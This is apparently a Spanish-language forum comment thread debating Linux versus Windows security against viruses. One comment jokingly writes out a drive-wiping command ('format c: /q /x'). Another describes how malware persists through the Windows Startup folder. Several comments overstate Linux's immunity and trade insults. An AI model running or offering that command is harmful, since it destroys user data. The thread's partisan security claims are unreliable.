La única forma que te admito en cuanto a infección por un virus en Linux, es a través de ejecutables, pero aún afectando a la cuenta root, es controlable.
Es absurdo echarle la culpa de toda inseguridad en su sistema, a los usuarios Windows, ¿Porqué?,
¿Porque actuan como administradores?.
Mira, en muchas distros Linux, en el proceso de instalación, no recomiendan la creación del usuario root, tal vez Microsoft debería empezar por ahí.
Buffer overflow, ¿Pero tú sabes de lo que hablas?
Como hacer un “virus” en windows, en 5 segundos:
format c: /q /x
tachannnn todo limpito.
Tú has pedido un ejemplo en el que se demuestre que la estructura de Linux le haga superior a Windows en cuanto a seguridad y te lo he dado
Tu has dado una característica común a todo sistema operativo moderno. Es pura lógica que algo común a todos no puede ser un distintivo de Linux.
Ah, y para rematarlo, memoria virtual y memoria protegida son dos conceptos distintos. La memoria virtual ofrece a un proceso la ilusión de un espacio de direcciones contiguo, mientras que el concepto de memoria protegida simplemente asegura que un proceso no accede a memoria que no le haya asignado el sistema operativo.
Por cierto, en Vista ningún usuario tiene privilegios salvo que desactives UAC y la documentación explícitamente recomienda la creación de una cuenta de usuario estándar.
No tienes ni idea de lo que dices, y como el 99% de los linuxeros, solo regurgitas las estupideces que han leido por internet de los tiempos de Windows 95, en un intento de embaucar a más idiotas en su fracasada cruzada.
@linuxsucks
“Tu has dado una característica común a todo sistema operativo moderno. Es pura lógica que algo común a todos no puede ser un distintivo de Linux”.
1º Se ve que no tienes ni idea del mecanismo de infección de un virus y que la réplica del mismo afectando a la memoria de diferentes procesos es algo habitual en Windows y además por su propia arquitectura, ahora me vas a negar que no hay virus en Windows en este sentido.
2º La arquitectura de memoria virtual EN LINUX, no permite este tipo de infecciones y lo que hice es resaltar a pinkfloyd que nada tenía que ver con lo que él decía.
3º Tú hablas de documentacion del Vista y yo te hablo de que en el proceso de instalación de algunas distros linux, no se recomienda la creación de cuenta root, algo evidentemente para iniciáticos en este sistema ya que para usuarios más experimentados es recomendable la creación de la cuenta root.
@rafa
No conozco a nadie al que le haya afectado el .desktop, ni he leido en internet que le haya afectado a nadie..
Joder! como molan estos post,personalmente uso linux con la distro de ubuntu por ser una distribucion estable y con mas paquetes pero comparando el rendimiento y estabilidad con otros S.O no cabe la menor duda de que linux es mejor, chavales no discutan con personas que no quieren ver la realidad,Deymox no te esfuerzes por mostrarle la verdad al pinkfloyd el ya la sabe pero la niega =P el problema de los virus en linux ya se los han explicado pero no hacen caso joder!! chavales lo permisos, los permisos!!!!! XD
chao y larga vida para el software libre.
Ignorando a la terquedad de ciertas personas.
Firewall = de seguro que una verja de una casa
@Jose Alguien tenia que decirlo
Coincido con José, dejad que pinkfloyd y demas gente que no quiera mejorar use $window$ y se meta en problemas, al rato que le caigan viruz al servidor pensara en algún sistema UNIX. Nadie los va a cambiar.
GNU Linux no solo supera a otros sistemas en flexibilidad y seguridad (aunque no son igual de sencillos) sino tambien en su filosofía y comunidad.
Lo realmente bueno no es para todos, lamentablemente esa es la realidad.
Francamente, no creo que haya alguien tan idiota como para ejecutar código descargado de un sitio cualquiera de internet, o de su correo electrónico siendo usuario de linux.
Por otra parte, los usuarios de linux preocupados por la seguridad, activan SELinux.
¡¡Auxiliooo, he cogido el virus A1!!! XD
Hasta donde tengo entendido, si un usuario esta logueado como root y ejecuta una aplicacion que no debe, un virus, pues haria el mismo efecto que en Windows. ¿Ocaso existe alguna manera de protegerse de eso?
No.
Pues no, lo que sucede es que en Windows XP la instalacion por omision es como “root” por tanto ya viene con los privilegios. Contrario a Vista y 7 que viene con “root” disable y con UAC enable. Y el SO mas extendido en las PC en casa es el XP por eso el reflejo de la falta de seguridad. Pero un XP con un profile user no tiene ese problema.
Un gran error de la no-noticia es comparar un .desktop con un .exe, .com, etc. Eso es FALSO.
Si acaso, un .desktop sería comparable al autorun.inf que aparece como portador de virus en muchas memorias USB.
Pero realmente el autorun.inf, así como el .desktop no son el virus, sino simples lanzadores del virus.
Para que haya virus, tiene que haber un programa a ejecutar, y aquí es donde Windows falla estrepitosamente al considerar los .exe, .com, etc. como programas simplemente por su extensión.
Así, en cualquier sitio que tu windows pueda escribir un fichero, puede haber un virus, porque si el fichero es .exe se ejecutaría y para ejecutarlo repetidamente simplemente añadiría un enlace directo o .lnk en la ruta C:\Documents and settings\nombre usuario\Menú inicio\Programas\Inicio”, ruta que se consigue con una simple llamada a la función del sistema SHGetSpecialFolderLocation(NULL,CSIDL_STARTUP,&cDirEspecialPidl).
En cambio en linux hace falta que el virus real, en este caso decían un fichero s.py (que no es comparable por ser un lenguaje interpretado, es como poner un .bas -de basic- en windows), tenga permiso de escritura.
¿Saben ustedes que en Linux se puede hacer que el espacio de usuario /home, así como las unidades extraibles /media/… y el fichero temporal /tmp NO Tengan permiso de ejecución?
En Linux cada fichero tiene tres posibles permisos: lectura (r), escritura (w) y ejecución (x), la seguridad total (excepto agujeros de seguridad del sistema que es imposible no tener) vendría de que en los usuarios:
Nunca tener escritura (w) y ejecución (x) en un mismo directorio, es decir que
1.- Tendría lectura y ejecución en los directorios del sistema con los programas instalados (para así poder abrir el navegador, el procesador de textos, etc.
2.- Y lectura y escritura en las unidades de trabajo (/home, /tmp, /media/…), de tal forma que no se podría ejecutar jamás un programa no instalado manualmente.
Por eso es Linux, así como cualquier sistema que venga de Unix (Mac OS, BSD, …) mucho más seguro que Windows.
Otro lugar por el que se cuelan los virus es por instalar “manualmente” programas con virus, por eso es malo usar programas piratas o cracks para los mismos. Y ahí ya cae también Mac OS, como cualquier sistema que se base en la comercialización por licencias, por pago por programa, ya que éstos se piratean y los que los ponen piratas en emule, ares, o cracks en determinadas webs pues les introducen virus.
En Linux no pasa, siempre que lo que instales sea de repositorios de paquetes oficiales, o de reconocido prestigio (medibuntu por ejemplo).
Incluso los programas gratuitos pueden tener virus si no los bajas de repositorios oficiales, de la misma web del autor (siempre que su servidor no esté infectado, si es Windows tiene más probabilidades), yo he visto virus en paquetes de codecs autoinstalables bajados de softonic.
Si quieres seguridad, usa Linux, instala sólo de los repositorios oficiales y podrás dormir más tranquilo.
no mammes we no seas estupido no se iaman virus se iaman ejekutables imbesil i io ago lo mismo pero asia windows idiota!!!
“Educado” para dirigirse a otras personas y una forma “elegante” de escribir.
Si, en definitiva eres usuario de windows. Pero no el usuario consciente que paga religiosamente su licencia, sino uno que usa una versión mas pirata que barba roja.
Mejor evita exhibirte y menos con “apodos” como “linux4ever”, del cual seguro solo sabes el nombre y las campañas de “FUD” hacia el mismo.
Linux es un virus en sí mismo… pero es el niño mimado de la prensa y de una legión de fanáticos ignorantes que alimentan las maravillas mitológicas que se construyen a su alrededor.
!?!?!QUE!?!?! ¿HAY VIRUS EN LINUX? NO LO PUEDO CREER QUE TRISTEZA, ME HE DECEPCIONADO, ME ESTABA BAJANDO UBUNTU, TENDRÉ QUE COMPRAR UN MACBOOK, O UN IMAC
para mac tienes unos cuantos troyanos… y algún virus.